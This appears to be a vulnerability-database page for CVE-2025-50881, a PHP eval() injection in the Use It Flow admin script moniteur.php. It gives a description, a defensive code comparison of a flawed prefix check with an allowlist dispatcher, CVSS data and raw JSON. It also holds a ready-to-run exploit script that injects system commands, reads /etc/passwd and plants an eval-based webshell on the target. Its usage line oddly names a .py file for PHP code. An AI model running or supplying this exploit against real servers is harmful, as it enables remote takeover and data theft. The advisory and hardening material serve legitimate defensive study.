Security Vulnerability Report
CVE-2025-50881 CVSS 8.8 HIGH

CVE-2025-50881

Published: 2026-03-16 21:16:17
Last Modified: 2026-04-27 19:18:47

Description

The `flow/admin/moniteur.php` script in Use It Flow administration website before 10.0.0 is vulnerable to Remote Code Execution. When handling GET requests, the script takes user-supplied input from the `action` URL parameter, performs insufficient validation, and incorporates this input into a string that is subsequently executed by the `eval()` function. Although a `method_exists()` check is performed, it only validates the part of the user input *before* the first parenthesis `(`, allowing an attacker to append arbitrary PHP code after a valid method call structure. Successful exploitation allows an unauthenticated or trivially authenticated attacker to execute arbitrary PHP code on the server with the privileges of the web server process.
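
The gap between the check and the executed string, as an added example that is not the vendor's code or anything from the original page. The `Monitor` class, its method names, and the functions `prefixOnlyCheck()` and `dispatch()` are hypothetical, and the inputs are constructed. It compares a check that inspects only the text before the first `(` with a dispatcher that validates the whole value against an allowlist and calls the method directly instead of building a string for `eval()`.

```php
<?php
declare(strict_types=1);

// Hypothetical stand-in for the class whose methods the admin page dispatches to.
final class Monitor
{
    public function status(): string { return 'ok'; }
    public function queueLength(): string { return '0'; }
}

// The check as the description characterises it: only the text before the
// first "(" is validated, so anything after it is never inspected.
function prefixOnlyCheck(object $target, string $action): bool
{
    $name = strstr($action, '(', true);   // false when there is no "("
    return $name !== false && method_exists($target, $name);
}

// Hardened dispatch: the whole value must be a bare method name taken from a
// fixed allowlist, and the call is made directly, never through eval().
function dispatch(object $target, string $action): string
{
    $allowed = ['status', 'queueLength'];
    if (!in_array($action, $allowed, true)) {
        throw new InvalidArgumentException('unknown action');
    }
    return $target->$action();
}

$monitor = new Monitor();
// Constructed inputs: a plain call, and the same call with trailing text.
foreach (['status()', 'status();trailing text'] as $input) {
    printf("%-26s prefix check: %s\n", $input,
        prefixOnlyCheck($monitor, $input) ? 'accepted' : 'rejected');
}
foreach (['status', 'status();trailing text'] as $input) {
    try {
        printf("%-26s dispatch: %s\n", $input, dispatch($monitor, $input));
    } catch (InvalidArgumentException $e) {
        printf("%-26s dispatch: rejected\n", $input);
    }
}
```

The prefix check accepts both inputs because it never looks past the parenthesis, while the allowlist dispatcher accepts only the exact method name.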

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Use It Flow administration website < 10.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
php
<?php
/**
 * CVE-2025-50881 PoC - Use It Flow RCE via action parameter
 * Target: flow/admin/moniteur.php
 * Vulnerability: Insufficient validation in eval() allows PHP code injection
 *
 * Usage: php cve-2025-50881.py <target_url>
 * Example: php cve-2025-50881.py http://victim.com/useitflow
 */

$target = $argv[1] ?? 'http://localhost';
$path = '/flow/admin/moniteur.php';

// Method 1: Basic RCE via system()
$action1 = "system()*/}system('id');/*";
$url1 = "{$target}{$path}?action=" . urlencode($action1);
echo "[*] Method 1: Basic RCE\n";
echo "[*] URL: {$url1}\n";
$response1 = file_get_contents($url1);
echo "[+] Response:\n{$response1}\n\n";

// Method 2: Using passthru() for blind RCE
$action2 = "passthru()*/}passthru('cat /etc/passwd');/*";
$url2 = "{$target}{$path}?action=" . urlencode($action2);
echo "[*] Method 2: Read /etc/passwd\n";
echo "[*] URL: {$url2}\n";
$response2 = file_get_contents($url2);
echo "[+] Response:\n{$response2}\n\n";

// Method 3: Using exec() to write webshell
$webshell = '<?php @eval($_POST["cmd"]); ?>"';
$action3 = "file_put_contents()*/}file_put_contents('shell.php','" . $webshell . "');/*";
$url3 = "{$target}{$path}?action=" . urlencode($action3);
echo "[*] Method 3: Write Webshell\n";
echo "[*] URL: {$url3}\n";
echo "[!] After execution, webshell may be available at: {$target}/shell.php\n\n";

// Method 4: Using shell_exec()
$action4 = "shell_exec()*/}echo shell_exec('whoami');/*";
$url4 = "{$target}{$path}?action=" . urlencode($action4);
echo "[*] Method 4: Get current user\n";
echo "[*] URL: {$url4}\n";
$response4 = file_get_contents($url4);
echo "[+] Response:\n{$response4}\n";
?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-50881", "sourceIdentifier": "[email protected]", "published": "2026-03-16T21:16:16.670", "lastModified": "2026-04-27T19:18:46.690", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The `flow/admin/moniteur.php` script in Use It Flow administration website before 10.0.0 is vulnerable to Remote Code Execution. When handling GET requests, the script takes user-supplied input from the `action` URL parameter, performs insufficient validation, and incorporates this input into a string that is subsequently executed by the `eval()` function. Although a `method_exists()` check is performed, it only validates the part of the user input *before* the first parenthesis `(`, allowing an attacker to append arbitrary PHP code after a valid method call structure. Successful exploitation allows an unauthenticated or trivially authenticated attacker to execute arbitrary PHP code on the server with the privileges of the web server process."}, {"lang": "es", "value": "El script `flow/admin/moniteur.php` en el sitio web de administración de Use It Flow anterior a 10.0.0 es vulnerable a ejecución remota de código. Al manejar solicitudes GET, el script toma la entrada proporcionada por el usuario del parámetro URL `action`, realiza una validación insuficiente e incorpora esta entrada en una cadena que es ejecutada posteriormente por la función `eval()`. Aunque se realiza una verificación `method_exists()`, solo valida la parte de la entrada del usuario *antes* del primer paréntesis `(`, permitiendo a un atacante añadir código PHP arbitrario después de una estructura de llamada a método válida. 
La explotación exitosa permite a un atacante no autenticado o trivialmente autenticado ejecutar código PHP arbitrario en el servidor con los privilegios del proceso del servidor web."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "http://advanced.com", "source": "[email protected]"}, {"url": "http://use.com", "source": "[email protected]"}, {"url": "https://github.com/0xdeadbit/CVE-2025-50881", "source": "[email protected]"}]}}